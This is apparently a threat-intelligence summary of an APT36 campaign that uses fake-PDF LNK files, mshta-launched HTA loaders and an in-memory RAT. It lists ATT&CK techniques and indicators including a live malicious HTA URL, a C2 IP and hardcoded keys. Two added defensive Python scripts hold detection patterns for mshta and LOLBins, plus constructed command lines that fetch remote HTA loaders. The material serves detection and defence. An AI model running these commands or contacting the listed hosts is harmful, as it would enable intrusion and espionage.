APT36 : Multi-Stage LNK Malware Campaign Targeting Indian Government Entities

CYFIRMA attributes a targeted multi-stage, fileless espionage campaign to APT36 (Transparent Tribe) that uses weaponized LNK files masquerading as PDFs to deliver HTA loaders and in-memory .NET deserialization payloads. The operation deploys configuration and RAT payloads (ReadOnly/WriteOnly -> ki2mtmkl.dll, iinneldc.dll), adapts persistence based on detected AV products, and maintains encrypted C2 communications to 2.56.10.86 for surveillance and data exfiltration. #APT36 #ReadOnly

Keypoints

  • APT36 (Transparent Tribe) conducted a spear-phishing campaign delivering a ZIP archive (“Online JLPT Exam Dec 2025.zip”) containing an oversized .pdf.lnk shortcut that embeds full PDF content to masquerade as a legitimate document.
  • The LNK launches mshta.exe to retrieve and execute a remote HTA loader (https://innlive.in/assets/public/01/jlp/jip.hta) which implements Base64/XOR decryption and in-memory reconstruction of payloads.
  • Multi-stage, fileless execution: a ReadOnly configuration payload weakens .NET deserialization safeguards (XAML/ObjectDataProvider abuse), and a WriteOnly/fileless DLL (ki2mtmkl.dll → iinneldc.dll) executes entirely in memory as a RAT.
  • The RAT provides extensive espionage capabilities: system profiling, remote command execution, file enumeration/exfiltration, screen capture, remote desktop, clipboard theft/manipulation, and stored-password harvesting.
  • Persistence and evasion are AV-aware: the malware profiles installed antivirus products via WMI and selects tailored persistence paths (Startup shortcuts, HTA/batch files, registry changes) to survive in diverse environments.
  • Command-and-control uses encrypted channels (AES with hardcoded key ZAEDF_98768_@$#%_QCHF) and communicates with C2 at 2.56.10.86:8621 for command retrieval and data exfiltration.
  • Recommendations include blocking LNK attachments at gateways, enabling full file extension visibility, restricting mshta/PowerShell/HTA usage, deploying EDR/behavioral detection, and integrating IOCs and YARA rules into detection stacks.
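The first two key points describe the lure: a shortcut named to look like a PDF, padded with the decoy document's bytes, whose target invokes mshta.exe with a remote URL. The following triage script is an added example (not CYFIRMA's code or the campaign's) that applies exactly those heuristics to a .lnk file: header check, double extension, abnormal size, embedded `%PDF-` magic, and LOLBin or URL strings in the UTF-16 arguments. The sample files it builds are constructed in-line, the URL `example.invalid` is a placeholder, and the 64 KB size threshold is an assumption chosen for the example.

```python
import re

# Shell Link (.lnk) fixed header: HeaderSize 0x4C followed by the ShellLink CLSID.
LNK_MAGIC = b"\x4c\x00\x00\x00"
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HEADER_SIZE = 0x4C

# Extensions that commonly precede ".lnk" in a double-extension lure.
DOCUMENT_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg")
# Living-off-the-land binaries the report names as stage-one launchers.
LOLBINS = ("mshta", "powershell", "cmd.exe", "wscript", "cscript", "rundll32")
# Assumption for this example: ordinary shortcuts are a few KB; anything larger is worth a look.
OVERSIZE_BYTES = 64 * 1024


def is_lnk(data: bytes) -> bool:
    """True when the file carries a valid Shell Link header."""
    return data[:4] == LNK_MAGIC and data[4:20] == LNK_CLSID


def utf16_strings(data: bytes, min_len: int = 6) -> list[str]:
    """Extract printable UTF-16LE runs; a .lnk stores its target/arguments this way when IsUnicode is set."""
    pattern = rb"(?:[\x20-\x7e]\x00){%d,}" % min_len
    return [m.group().decode("utf-16-le") for m in re.finditer(pattern, data)]


def triage_lnk(filename: str, data: bytes) -> list[str]:
    """Return a list of human-readable findings; an empty list means nothing suspicious was seen."""
    findings: list[str] = []
    if not is_lnk(data):
        return ["not a Shell Link: header magic/CLSID mismatch"]
    name = filename.lower()
    if name.endswith(".lnk") and name[:-4].endswith(DOCUMENT_EXTS):
        findings.append("double extension: document-looking name ending in .lnk")
    if len(data) > OVERSIZE_BYTES:
        findings.append(f"oversized shortcut: {len(data)} bytes")
    if b"%PDF-" in data:
        findings.append("embedded PDF content (decoy document carried inside the shortcut)")
    for s in utf16_strings(data):
        low = s.lower()
        if any(tool in low for tool in LOLBINS):
            findings.append(f"LOLBin in link target/arguments: {s}")
        if re.search(r"https?://", low):
            findings.append(f"remote URL in link arguments: {s}")
    return findings


def _lnk(body: bytes) -> bytes:
    """Constructed minimal .lnk: a valid 76-byte header followed by an arbitrary body."""
    return LNK_MAGIC + LNK_CLSID + b"\x00" * (HEADER_SIZE - 20) + body


def malicious_sample() -> tuple[str, bytes]:
    # Constructed lure: mshta-style arguments, a decoy PDF blob, and padding to mimic an oversized file.
    args = "/c mshta.exe https://example.invalid/loader.hta".encode("utf-16-le")
    decoy = b"%PDF-1.4\n%decoy document bytes\n" + b"\x00" * 70_000
    return "Online JLPT Exam Dec 2025.pdf.lnk", _lnk(args + b"\x00\x00" + decoy)


def benign_sample() -> tuple[str, bytes]:
    # Constructed ordinary shortcut: local target, no URL, no decoy, small size.
    target = "C:\\Windows\\System32\\notepad.exe".encode("utf-16-le")
    return "Notepad.lnk", _lnk(target)


if __name__ == "__main__":
    for sample in (malicious_sample(), benign_sample()):
        print(sample[0], "->", triage_lnk(*sample) or ["clean"])
```

The string extraction is deliberately crude (it does not walk the LinkInfo and StringData blocks), which is the right trade-off for a mail-gateway or triage pass: it costs nothing and still surfaces the mshta/URL combination and the embedded decoy that make this lure work.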

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – Initial delivery via a malicious ZIP archive containing a deceptive .pdf.lnk attachment (‘the threat actor uses a malicious ZIP archive titled “Online JLPT Exam Dec 2025.zip” as the initial delivery vector’)
  • [T1059] Command and Scripting Interpreter – Abuse of scripting and system interpreters (mshta.exe, PowerShell, cmd.exe) to execute payloads and minimize artifacts (‘Utilizes trusted Windows binaries (mshta.exe, PowerShell, cmd.exe) and in memory execution to minimize on disk artifacts and evade detection’)
  • [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell used to invoke mshta and execute obfuscated payloads during persistence (‘the payload is then executed using the trusted Windows binary mshta.exe via a PowerShell invocation’)
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – HTA/ActiveX and WScript objects used for environment interaction and execution (‘The HTA leverages ActiveX objects, particularly WScript.Shell, to interact with the Windows environment.’)
  • [T1218.005] System Binary Proxy Execution: Mshta – Execution of remote HTA content via mshta.exe with the URL passed as a command-line argument (‘it executes the legitimate Windows utility mshta.exe, passing a remote URL as a command line argument’)
  • [T1547.001] Boot or Logon Autostart Execution: Startup Folder – Malware drops shortcuts and HTA/batch files into the Startup folder to establish persistence (‘establishes persistence by dropping a shortcut file in the user’s Startup folder’)
  • [T1112] Modify Registry – Queries registry values and sets the COMPLUS_Version environment variable to adjust runtime behavior and as part of persistence fallback (‘it queries registry values to determine the available .NET runtime and dynamically sets the COMPLUS_Version environment variable.’)
  • [T1055] Process Injection – Fileless DLLs are deserialized and executed in memory, avoiding disk artifacts (‘WriteOnly is a fileless DLL payload that is deserialized and executed entirely in memory’)
  • [T1036] Masquerading – Use of a double-extension .pdf.lnk and embedded PDF content to impersonate a legitimate document (‘the .lnk file convincingly masquerades as a legitimate PDF document’)
  • [T1027] Obfuscated Files or Information – HTA loader implements custom Base64 and XOR decryption/obfuscation routines to conceal payloads (‘the script then defines several functions … that collectively implement custom Base64 decoding and XOR-based decryption routines’)
  • [T1070] Indicator Removal on Host – In-memory execution and minimized on-disk artifacts reduce forensic traces (‘in memory execution to minimize on disk artifacts and evade detection’)
  • [T1202] Indirect Command Execution – Use of intermediate scripts (batch/HTA/PowerShell) to indirectly execute malicious payloads (‘writes the HTA payload to disk and executes it indirectly through the batch script’)
  • [T1497] Virtualization / Sandbox Evasion – Techniques chosen to reduce detection and sandbox visibility (‘These tactics significantly reduce detection opportunities and enable prolonged, covert access’)
  • [T1564.001] Hide Artifacts: Hidden Files and Directories – Archive contains a hidden usb directory (usbsyn.pim) likely used for runtime data/code (‘the archive also contains a hidden directory named usb, which includes a file named usbsyn.pim’)
  • [T1555] Credentials from Password Stores – Malware harvests stored passwords from the system as part of data collection (‘harvesting stored passwords’)
  • [T1539] Steal Web Session Cookie – Campaign includes web session cookie theft capability as listed in the capability set (‘T1539 Steal Web Session Cookie’)
  • [T1082] System Information Discovery – Malware collects detailed host/system profiling information to fingerprint victims (‘Collects detailed host information, including OS version, username, installed software, and active antivirus products.’)
  • [T1057] Process Discovery – Malware enumerates running processes and can terminate selected processes (‘Lists running processes and terminates selected processes’)
  • [T1083] File and Directory Discovery – Recursive scanning of directories for sensitive documents for exfiltration (‘recursively scanning directories for sensitive document files, including Office documents, PDFs, text files, and database files’)
  • [T1518.001] Software Discovery: Security Software Discovery – Uses WMI to enumerate installed antivirus products and adapt behavior (‘queries the Windows Management Instrumentation (WMI) root\SecurityCenter2 namespace to enumerate installed antivirus products’)
  • [T1113] Screen Capture – Captures screenshots of the victim’s display, resizes/compresses them, and transmits them to C2 (‘captures a screenshot of the victim’s primary display using the CopyFromScreen() API … then transmitted to the command-and-control server’)
  • [T1115] Clipboard Data – Functions to read and overwrite clipboard contents for theft and manipulation (‘The getclipboardtext() function enables clipboard data theft … The setclipboardtext() function enables clipboard manipulation’)
  • [T1005] Data from Local System – Systematic collection of local files (Office, PDF, DB files) for exfiltration (‘CopySubfiles function performs systematic data theft by recursively scanning directories for sensitive document files’)
  • [T1560] Archive Collected Data – Collected files are Base64-encoded and AES-encrypted before transmission (‘All exfiltrated data is first Base64 encoded and then AES encrypted before transmission’)
  • [T1071.001] Application Layer Protocol: Web – C2 communications performed over application-layer web protocols (‘This function maintains persistent C2 communication with IP 2.56.10.86 on TCP port 8621’ and ‘reads encrypted command data from the attacker-controlled server’)
  • [T1095] Non-Application Layer Protocol – Use of non-application-layer transport methods for C2 as enumerated in the ATT&CK mapping (‘T1095 Non-Application Layer Protocol’)
  • [T1573] Encrypted Channel – Encrypted C2 channel using AES and a hardcoded key for confidentiality (‘the received data is decrypted using AES with a hardcoded key (“ZAEDF_98768_@$#%_QCHF”)’)
  • [T1105] Ingress Tool Transfer – HTA and DLL payloads retrieved from remote URLs during the initial stages (‘HTA source: https://innlive.in/assets/public/01/jlp/jip.hta’)
  • [T1041] Exfiltration Over C2 Channel – Data exfiltration performed over the established C2 channel to the attacker server (‘All exfiltrated data is first Base64 encoded and then AES encrypted before transmission … Send() handles final delivery to the attacker controlled command and control server’)
  • [T1565.001] Data Manipulation: Stored Data – Malware can manipulate stored data and clipboard contents as part of its capabilities (‘Data Manipulation: Stored Data’ capability and clipboard overwrite functions)

Indicators of Compromise

  • [SHA-256 Hash] Malware component hashes observed – 06fb22c743fcc949998e280bd5deaf8f80d616b371576b5e11fd5b1d3b23a5f2, c1f3dea00caec58c9e0f990366ff40ae59e93f666f92e1c218c03478bf3abe17, and 1 other hash
  • [MD5 Hash] Reported MD5s for the distributed archive and components – Online JLPT Exam Dec 2025.zip: 30fda797535a0f367ea2809426760020, Online JLPT Exam Dec 2025.pdf.lnk: ceb715db684199958aa5e6c05dc5c7f0 (and other MD5s listed)
  • [File Name] Malicious file names and payloads used in the campaign – Online JLPT Exam Dec 2025.pdf.lnk (weaponized shortcut), jip.hta (HTA loader), ki2mtmkl.dll and iinneldc.dll (in-memory RAT payloads)
  • [Domain] Hosting and resource domains used for payloads/icons – innlive.in (HTA hosting: https://innlive.in/assets/public/01/jlp/jip.hta), drjagrutichavan.com (remote icon resource)
  • [IP Address] Command-and-control server – 2.56.10.86 (C2 on TCP port 8621)
  • [YARA / Hardcoded Keys] Embedded configuration/crypto strings and YARA-detectable keys – ZAEDF_98768_@$#%_QCHF, NMSOW_$^*$_68923_MOXOE (present in YARA rule and code)
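The indicators above and the recommendation to deploy behavioural detection for mshta/PowerShell/HTA usage translate directly into a handful of telemetry rules. The script below is an added example, not CYFIRMA's detection content, that runs four such rules over constructed process-creation, file-creation and network-connection events: mshta.exe launched with a remote URL (T1218.005), a script interpreter spawning mshta.exe (T1059), a new .lnk/.hta/.bat in the Startup folder (T1547.001), and a connection to the reported C2 endpoint 2.56.10.86:8621 or to the HTA host innlive.in. The pipe-delimited event format and the log lines themselves are constructed for the example; only the IP, port, domain and URL come from the report.

```python
import re

# Indicators taken from the report.
C2_IP, C2_PORT = "2.56.10.86", 8621
HTA_HOST = "innlive.in"

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
# A .lnk/.hta/.bat/.cmd written into the per-user Startup folder.
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\s\"']+\.(lnk|hta|bat|cmd)$", re.I)
SCRIPT_HOSTS = ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")


def parse_event(line: str) -> dict:
    """Constructed format: timestamp|event_type|key=value|key=value..."""
    parts = line.split("|")
    ev = {"ts": parts[0], "event": parts[1]}
    for kv in parts[2:]:
        key, _, value = kv.partition("=")
        ev[key] = value
    return ev


def detect(ev: dict) -> list[str]:
    """Apply the campaign-specific rules to one event; returns zero or more hit descriptions."""
    hits: list[str] = []
    if ev["event"] == "process_create":
        image = ev.get("image", "").lower()
        parent = ev.get("parent", "").lower()
        cmdline = ev.get("cmdline", "")
        if image.endswith("mshta.exe") and URL_RE.search(cmdline):
            hits.append("T1218.005 mshta.exe launched with a remote URL")
        if image.endswith("mshta.exe") and parent.endswith(SCRIPT_HOSTS):
            hits.append("T1059 script interpreter spawned mshta.exe (persistence re-launch pattern)")
        if HTA_HOST in cmdline.lower():
            hits.append(f"IoC domain {HTA_HOST} in command line")
    elif ev["event"] == "file_create":
        if STARTUP_RE.search(ev.get("path", "")):
            hits.append("T1547.001 shortcut/script dropped into Startup folder")
    elif ev["event"] == "network_connect":
        port = int(ev.get("dst_port", "0") or 0)
        if ev.get("dst_ip") == C2_IP and port == C2_PORT:
            hits.append(f"IoC C2 connection to {C2_IP}:{C2_PORT}")
    return hits


def scan(lines: list[str]) -> list[tuple[str, str]]:
    """Run every rule over every line; returns (timestamp, hit) pairs."""
    return [(ev["ts"], hit) for ev in map(parse_event, lines) for hit in detect(ev)]


# Constructed sample telemetry: four malicious-looking events followed by two benign ones.
SAMPLE_LOG = r"""
2025-12-01T09:00:01Z|process_create|image=C:\Windows\System32\mshta.exe|parent=C:\Windows\explorer.exe|cmdline=mshta.exe https://innlive.in/assets/public/01/jlp/jip.hta
2025-12-01T09:00:02Z|process_create|image=C:\Windows\System32\mshta.exe|parent=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmdline=mshta.exe C:\Users\victim\AppData\Roaming\update.hta
2025-12-01T09:00:03Z|file_create|path=C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk
2025-12-01T09:00:04Z|network_connect|dst_ip=2.56.10.86|dst_port=8621
2025-12-01T09:00:05Z|process_create|image=C:\Windows\System32\notepad.exe|parent=C:\Windows\explorer.exe|cmdline=notepad.exe report.txt
2025-12-01T09:00:06Z|network_connect|dst_ip=8.8.8.8|dst_port=53
""".strip().splitlines()


if __name__ == "__main__":
    for ts, hit in scan(SAMPLE_LOG):
        print(ts, hit)
```

The first two rules are the durable ones: the IP, port and domain will rotate, but mshta.exe taking a URL on its command line and a script host re-launching mshta from a Startup artifact describe the technique rather than this particular infrastructure.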

Read more: https://www.cyfirma.com/research/apt36-multi-stage-lnk-malware-campaign-targeting-indian-government-entities/